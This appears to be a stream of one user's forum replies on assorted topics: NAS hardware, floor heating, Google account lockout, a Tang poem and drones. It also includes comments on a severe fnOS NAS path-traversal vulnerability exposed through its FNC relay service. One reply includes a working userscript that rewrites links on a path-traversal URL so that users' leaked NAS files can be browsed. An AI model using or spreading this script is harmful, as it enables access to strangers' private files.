@eber 应该是没仔细看这次的事件吧。即使没有映射和开放任何端口到外网，也没有通过自建的穿透到公网服务器，仍然可能会受到影响，这是 FNC 服务的设计导致的，通过遍历扫描几乎可以连接到所有开启了这个服务的机器，样本统计下来，FNC 开启率还是非常非常高的，平均下来也在 80%以上。这个是飞牛系统除硬件收入、企业订阅外的很大的商业收入来源，而且提供了免费慷慨的接入服务。

如果开启这个服务也会导致所有数据全部泄露，那我感觉不太能因为这个行为怪用户~

本质上是这个漏洞太低级了，低级到近 20 年我作为半个网安圈的人都没怎么遇到过知名系统犯过这个错误

@qianlongzt 所以一直到现在，还有非常多仍然受到影响的。有意思的是可以看到飞牛自带 nginx 的日志，找了几个分析了下，早就被轮了无数遍了。

https://imgur.com/a/ObaURjs

@coolair 这并不能避免影响。现在的这俩漏洞不只是可以看到和拿到你的文件，还可以肆意乱搞，当成肉鸡或者挖矿都是小事，还可以开内网的洞，影响面可就不是这一台机器这么简单了。

这个简单的油猴脚本就可以正常浏览用户泄露文件了

```Javascript
// ==UserScript==
// @name 路径遍历链接修复工具
// @namespace http://tampermonkey.net/
// @version 1.0
// @description 修复特定路径下的 LFI/目录遍历链接拼接问题
// @author xxx
// @match *://*/app-center-static/serviceicon/myapp/%7B0%7D/*
// @grant none
// ==/UserScript==

(function() {
'use strict';

// 获取当前页面的查询参数，即 ?size=../../../../ 部分
const currentSearch = window.location.search;
// 获取当前页面的基础路径，即 /app-center-static/serviceicon/myapp/%7B0%7D/
const currentPath = window.location.pathname;

// 选取所有的 <a> 标签
const links = document.querySelectorAll('a');

links.forEach(link => {
// 获取 HTML 中原本的 href 属性值（例如 "vol1/" 或 "bin"），而非浏览器解析后的完整 URL
const rawHref = link.getAttribute('href');

if (rawHref) {
// 核心逻辑：基础路径 + 原有查询参数 + 目标文件路径
// 结果：.../myapp/%7B0%7D/?size=../../../../vol1/
const newUrl = currentPath + currentSearch + rawHref;

// 修改链接的指向
link.href = newUrl;
}
});

console.log(`已修正 ${links.length} 个路径遍历链接。`);
})();
```

《异物志》

著名闭源翻译插件是哪个

@EmpCold 一楼、有热交换新风，锅炉用的欧标冷凝炉，装修时特别盯了下保温层施工，应该就这些因素

@ucaime 另外补充一个，持续运行后不像第一次开机，第一次开机或者冷启动耗气极高，热效率有个曲线，你可以打开你的锅炉说明书研究一下

燃气地暖，冷凝炉，将房间温控面板温度设置到 26-28 （相当于常开，完全不用温控，仅在外环境温度特别高时作为熔断措施）。根据环境温度调控冷凝炉水温（变动并不大）。120 平，室内温度 24 基本稳定，月燃气费（混合生活用水燃气费用）平均 600-900 （ 900 是每年最冷的月份）。

以上是目前摸索下来最舒适和节能的方案。

6 年前刚安装时依赖面板温控，两个问题比较严重

1. 室温浮动大：水地暖升温降温慢，面板开关阈值一般 1°，导致实际感受温差会超过 3-5 ；
2. 冷凝炉频繁启动关闭导致节能效果不佳且维护保养要跟上，不然分分钟停机或出问题；

另外还有一些其他信息可以参考
1. 分区温控有时候还是要搞，但最好能确保持续运行而不是停停转转，例如工作间因为散热设备多，面板设置 20 足够，且工作时需要冷静不想太热。
2. 维护保养很重要，管道定期脉冲清洗，冷凝炉保养。
3. 冷凝炉娇贵但却是节能，用的多还可以。

基于 6 年前经验，现在应该有更好的做法或者设备已经迭代很好了，所以仅供参考

最近也经历了一次，偶然通过绑定的某个备用 Android 手机搞回来了。
原因：找回后在谷歌的活动日志中检查了所有可能的原因，最后猜测为因 DLER 的订阅地址调整，更换了自己的规则库，导致多个设备的 google 流量出口不再一致，同时可以确认某个出口节点是个垃圾出口，叠加两个因素后进入风控状态。提示因多次尝试需要等待几个小时，但实际上几天都不行。
直到某天，备用 Android 机偶尔开机取个东西，gmail 跳出了需要重新登陆谷歌账号的提示，这台机器的 Google Play 也提示需要重新登陆，遂正常操作登陆。然后全平台解除了风控，账号恢复正常。除了这台机器，任何一个设备、任何浏览器，哪怕指纹浏览器都不允许登陆。

试过好几个类似的服务了

@ucaime GEN8 不是 1265 ，是 1260 ，前段时间装了飞牛体验了一下，还不错，就是有些机制不如群晖舒服，模仿的痕迹过于明显，但体验很好

我的群晖 920+和一台服役很久的 GEN8 刚刚挂了小黄鱼，要是自己人买可以再便宜点。
920+是 20g 内存，一条傲腾的缓存 ssd ；
GEN8 是 1265L+16g ECC 内存，再加一个 2.5g 网卡，稳得一批，多少年了基本上没重启过；
NAS 还是要关注下电源质量，不然硬盘挂了数据损失比什么都扯淡，中途自组过不少，但没有一个比得上这俩的。最近更换了 8 盘的，原来的这俩就不需要了

@beimenjun 这都不能算尴尬了，但凡有一点欣赏价值也不能一点欣赏价值都没有~~

哪来的李白的诗，这不是白居易的吗？

### 社日关路作

晚景函关路，凉风社日天。

青岩新有燕，红树欲无蝉。

愁立驿楼上，厌行官堠前。

萧条秋兴苦，渐近二毛年。

现在的无人机组件已经非常成熟了，飞控、图传可选项都有最佳实践，调参麻烦点但有很多乐趣。如果搞多轴买现成的肯定不折腾且更有优势。但如果你想搞个固定翼，或者再狠一点垂直起降固定翼，那就有意思多了，前提是有个 3D 打印机，我最近在尝试复刻道通的龙鱼系列~
目标：垂直起降、10 千克任务载重、200 千米最大航程、200 分钟带载航时、120km/h 最大飞行速度

补充一个黏黏世界

挺有意思的，我特别喜欢杂志阅读方式来获取信息。
如果这个能和语鲸结合一下就舒服了

@jacketma
@epicSoldier #4 没这么麻烦，下载 Telegram X ，就可以通过短信登录了